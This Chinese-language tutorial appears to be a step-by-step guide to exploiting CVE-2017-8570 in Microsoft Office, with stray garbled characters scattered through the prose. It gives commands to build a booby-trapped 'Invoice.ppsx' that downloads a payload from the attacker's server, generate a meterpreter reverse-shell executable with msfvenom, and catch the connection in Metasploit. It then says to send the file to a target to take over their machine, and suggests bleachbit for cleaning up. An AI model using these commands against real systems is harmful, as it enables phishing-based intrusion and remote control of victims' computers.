參考:
https://www.youtube.com/watch?v=jUhmPH_u6gs
https://github.com/tezukanice/Office8570
https://www.symantec.com/security_response/vulnerability.jsp?bid=99445
https://www.rapid7.com/db/vulnerabilities/msft-cve-2017-8570
簡介:Microsoft Office容易出現(xiàn)遠程代碼執(zhí)行漏洞。 攻擊者可以利用此問題在當前登錄的用戶的上下文中執(zhí)行任意代碼。 漏洞嘗試可能會導(dǎo)致拒絕服務(wù)條件速种。
影響范圍:
??Microsoft Office 2007 Service Pack 3
??Microsoft Office 2010 Service Pack 2 (32-bit editions)
??Microsoft Office 2010 Service Pack 2 (64-bit editions)
??Microsoft Office 2013 RT Service Pack 1
??Microsoft Office 2013 Service Pack 1 (32-bit editions)
??Microsoft Office 2013 Service Pack 1 (64-bit editions)
??Microsoft Office 2016 (32-bit edition)
??Microsoft Office 2016 (64-bit edition)
cd /tmp
git clone https://github.com/tezukanice/Office8570
cd Office8570
python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://監(jiān)聽者的IP/logo.doc
這里會提示找不到文件拙已,只需要創(chuàng)建template目錄,然后把提示到的文件mv進去就ok,用到的文件會在報錯最后一行提示
再次執(zhí)行一遍就成功了
生成了Invoice.ppsx文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=監(jiān)聽者IP LPORT=監(jiān)聽者端口 -f exe > /tmp/shell.exe
python cve-2017-8570_toolkit.py -M exp -e http://監(jiān)聽者IP/shell.exe -l /tmp/shell.exe
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 監(jiān)聽者IP
set LPORT 監(jiān)聽者端口
exploit
將Invoice.ppsx傳給目標赏殃,在目標打開這個ppt文件华嘹,拿下目標奖地。
在https://github.com/tezukanice/Office8570中状蜗,定義了三種不同情景的操作指導(dǎo)。
另:apt-get install bleachbit -y
這個軟件可以清理Linux電腦的一些緩存
